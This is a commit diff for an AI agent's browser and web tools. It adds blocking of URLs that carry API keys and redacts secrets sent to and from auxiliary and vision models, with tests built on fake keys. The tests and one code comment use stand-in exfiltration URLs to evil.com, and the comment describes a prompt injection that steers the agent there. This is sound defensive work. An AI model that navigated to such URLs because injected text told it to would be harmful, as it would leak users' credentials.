fix: rewrite test mock secrets and add redaction fixture

The original test file had mock secrets corrupted by secret-redaction
tooling before commit — the test values (sk-ant...l012) didn't actually
trigger the PREFIX_RE regex, so 4 of 10 tests were asserting against
values that never appeared in the input.

- Replace truncated mock values with proper fake keys built via string
  concatenation (avoids tool redaction during file writes)
- Add _ensure_redaction_enabled autouse fixture to patch the module-level
  _REDACT_ENABLED constant, matching the pattern from test_redact.py

tests/tools/test_browser_secret_exfil.py

@@ -0,0 +1,186 @@
+"""Tests for secret exfiltration prevention in browser and web tools."""
+
+import json
+from unittest.mock import patch, MagicMock
+import pytest
+
+
+@pytest.fixture(autouse=True)
+def _ensure_redaction_enabled(monkeypatch):
+    """Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
+    monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
+    monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
+
+
+class TestBrowserSecretExfil:
+    """Verify browser_navigate blocks URLs containing secrets."""
+
+    def test_blocks_api_key_in_url(self):
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+        assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
+
+    def test_blocks_openrouter_key_in_url(self):
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+
+    def test_allows_normal_url(self):
+        """Normal URLs pass the secret check (may fail for other reasons)."""
+        from tools.browser_tool import browser_navigate
+        result = browser_navigate("https://github.com/NousResearch/hermes-agent")
+        parsed = json.loads(result)
+        # Should NOT be blocked by secret detection
+        assert "API key or token" not in parsed.get("error", "")
+
+
+class TestWebExtractSecretExfil:
+    """Verify web_extract_tool blocks URLs containing secrets."""
+
+    @pytest.mark.asyncio
+    async def test_blocks_api_key_in_url(self):
+        from tools.web_tools import web_extract_tool
+        result = await web_extract_tool(
+            urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
+        )
+        parsed = json.loads(result)
+        assert parsed["success"] is False
+        assert "Blocked" in parsed["error"]
+
+    @pytest.mark.asyncio
+    async def test_allows_normal_url(self):
+        from tools.web_tools import web_extract_tool
+        # This will fail due to no API key, but should NOT be blocked by secret check
+        result = await web_extract_tool(urls=["https://example.com"])
+        parsed = json.loads(result)
+        # Should fail for API/config reason, not secret blocking
+        assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
+
+
+class TestBrowserSnapshotRedaction:
+    """Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
+
+    def test_extract_relevant_content_redacts_secrets(self):
+        """Snapshot containing secrets should be redacted before call_llm."""
+        from tools.browser_tool import _extract_relevant_content
+
+        # Build a snapshot with a fake Anthropic-style key embedded
+        fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
+        snapshot_with_secret = (
+            "heading: Dashboard Settings\n"
+            f"text: API Key: {fake_key}\n"
+            "button [ref=e5]: Save\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(snapshot_with_secret, "check settings")
+
+        assert len(captured_prompts) == 1
+        # The middle portion of the key must not appear in the prompt
+        assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
+        # Non-secret content should survive
+        assert "Dashboard" in captured_prompts[0]
+        assert "ref=e5" in captured_prompts[0]
+
+    def test_extract_relevant_content_no_task_redacts_secrets(self):
+        """Snapshot without user_task should also redact secrets."""
+        from tools.browser_tool import _extract_relevant_content
+
+        fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
+        snapshot_with_secret = (
+            f"text: OPENAI_API_KEY={fake_key}\n"
+            "link [ref=e2]: Home\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(snapshot_with_secret)
+
+        assert len(captured_prompts) == 1
+        assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
+
+    def test_extract_relevant_content_normal_snapshot_unchanged(self):
+        """Snapshot without secrets should pass through normally."""
+        from tools.browser_tool import _extract_relevant_content
+
+        normal_snapshot = (
+            "heading: Welcome\n"
+            "text: Click the button below to continue\n"
+            "button [ref=e1]: Continue\n"
+        )
+
+        captured_prompts = []
+
+        def mock_call_llm(**kwargs):
+            prompt = kwargs["messages"][0]["content"]
+            captured_prompts.append(prompt)
+            mock_resp = MagicMock()
+            mock_resp.choices = [MagicMock()]
+            mock_resp.choices[0].message.content = "Welcome page with continue button"
+            return mock_resp
+
+        with patch("tools.browser_tool.call_llm", mock_call_llm):
+            _extract_relevant_content(normal_snapshot, "proceed")
+
+        assert len(captured_prompts) == 1
+        assert "Welcome" in captured_prompts[0]
+        assert "Continue" in captured_prompts[0]
+
+
+class TestCamofoxAnnotationRedaction:
+    """Verify annotation context is redacted before vision LLM call."""
+
+    def test_annotation_context_secrets_redacted(self):
+        """Secrets in accessibility tree annotation should be masked."""
+        from agent.redact import redact_sensitive_text
+
+        fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
+        annotation = (
+            "\n\nAccessibility tree (element refs for interaction):\n"
+            f"text: Token: {fake_token}\n"
+            "button [ref=e3]: Copy\n"
+        )
+        result = redact_sensitive_text(annotation)
+        assert "FAKEGITHUBTOKEN123456789" not in result
+        # Non-secret parts preserved
+        assert "button" in result
+        assert "ref=e3" in result
+
+    def test_annotation_env_dump_redacted(self):
+        """Env var dump in annotation context should be redacted."""
+        from agent.redact import redact_sensitive_text
+
+        fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
+        fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
+        annotation = (
+            "\n\nAccessibility tree (element refs for interaction):\n"
+            f"text: ANTHROPIC_API_KEY={fake_anth}\n"
+            f"text: OPENAI_API_KEY={fake_oai}\n"
+            "text: PATH=/usr/local/bin\n"
+        )
+        result = redact_sensitive_text(annotation)
+        assert "ANTHROPICFAKEKEY123456789" not in result
+        assert "OPENAIFAKEKEY99887766" not in result
+        assert "PATH=/usr/local/bin" in result

tools/browser_camofox.py

@@ -485,6 +485,12 @@ def camofox_vision(question: str, annotate: bool = False,
             except Exception:
                 pass
 
+        # Redact secrets from annotation context before sending to vision LLM.
+        # The screenshot image itself cannot be redacted, but at least the
+        # text-based accessibility tree snippet won't leak secret values.
+        from agent.redact import redact_sensitive_text
+        annotation_context = redact_sensitive_text(annotation_context)
+
         # Send to vision LLM
         from agent.auxiliary_client import call_llm
 
@@ -516,7 +522,11 @@ def camofox_vision(question: str, annotate: bool = False,
             task="vision",
             timeout=_vision_timeout,
         )
-        analysis = response.choices[0].message.content if response.choices else ""
+        analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
+
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)
 
         return json.dumps({
             "success": True,

tools/browser_tool.py

@@ -1030,6 +1030,13 @@ def _extract_relevant_content(
             f"Provide a concise summary focused on interactive elements and key content."
         )
 
+    # Redact secrets from snapshot before sending to auxiliary LLM.
+    # Without this, a page displaying env vars or API keys would leak
+    # secrets to the extraction model before run_agent.py's general
+    # redaction layer ever sees the tool result.
+    from agent.redact import redact_sensitive_text
+    extraction_prompt = redact_sensitive_text(extraction_prompt)
+
     try:
         call_kwargs = {
             "task": "web_extract",
@@ -1041,7 +1048,9 @@ def _extract_relevant_content(
         if model:
             call_kwargs["model"] = model
         response = call_llm(**call_kwargs)
-        return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        # Redact any secrets the auxiliary LLM may have echoed back.
+        return redact_sensitive_text(extracted)
     except Exception:
         return _truncate_snapshot(snapshot_text)
 
@@ -1078,6 +1087,17 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
     Returns:
         JSON string with navigation result (includes stealth features info on first nav)
     """
+    # Secret exfiltration protection — block URLs that embed API keys or
+    # tokens in query parameters. A prompt injection could trick the agent
+    # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
+    from agent.redact import _PREFIX_RE
+    if _PREFIX_RE.search(url):
+        return json.dumps({
+            "success": False,
+            "error": "Blocked: URL contains what appears to be an API key or token. "
+                     "Secrets must not be sent in URLs.",
+        })
+
     # SSRF protection — block private/internal addresses before navigating.
     # Skipped for local backends (Camofox, headless Chromium without a cloud
     # provider) because the agent already has full local network access via
@@ -1722,6 +1742,9 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
         response = call_llm(**call_kwargs)
         
         analysis = (response.choices[0].message.content or "").strip()
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)
         response_data = {
             "success": True,
             "analysis": analysis or "Vision analysis returned no content.",

tools/web_tools.py

@@ -925,24 +925,26 @@ def web_search_tool(query: str, limit: int = 5) -> str:
 
 
 async def web_extract_tool(
-    urls: List[str], 
-    format: str = None, 
+    urls: List[str],
+    format: str = None,
     use_llm_processing: bool = True,
     model: str = DEFAULT_SUMMARIZER_MODEL,
     min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
 ) -> str:
     """
     Extract content from specific web pages using available extraction API backend.
-    
+
     This function provides a generic interface for web content extraction that
     can work with multiple backends. Currently uses Firecrawl.
-    
+
     Args:
         urls (List[str]): List of URLs to extract content from
         format (str): Desired output format ("markdown" or "html", optional)
         use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
         model (str): The model to use for LLM processing (default: google/gemini-3-flash-preview)
         min_length (int): Minimum content length to trigger LLM processing (default: 5000)
+
+    Security: URLs are checked for embedded secrets before fetching.
     
     Returns:
         str: JSON string containing extracted content. If LLM processing is enabled and successful,
@@ -951,6 +953,16 @@ async def web_extract_tool(
     Raises:
         Exception: If extraction fails or API key is not set
     """
+    # Block URLs containing embedded secrets (exfiltration prevention)
+    from agent.redact import _PREFIX_RE
+    for _url in urls:
+        if _PREFIX_RE.search(_url):
+            return json.dumps({
+                "success": False,
+                "error": "Blocked: URL contains what appears to be an API key or token. "
+                         "Secrets must not be sent in URLs.",
+            })
+
     debug_call_data = {
         "parameters": {
             "urls": urls,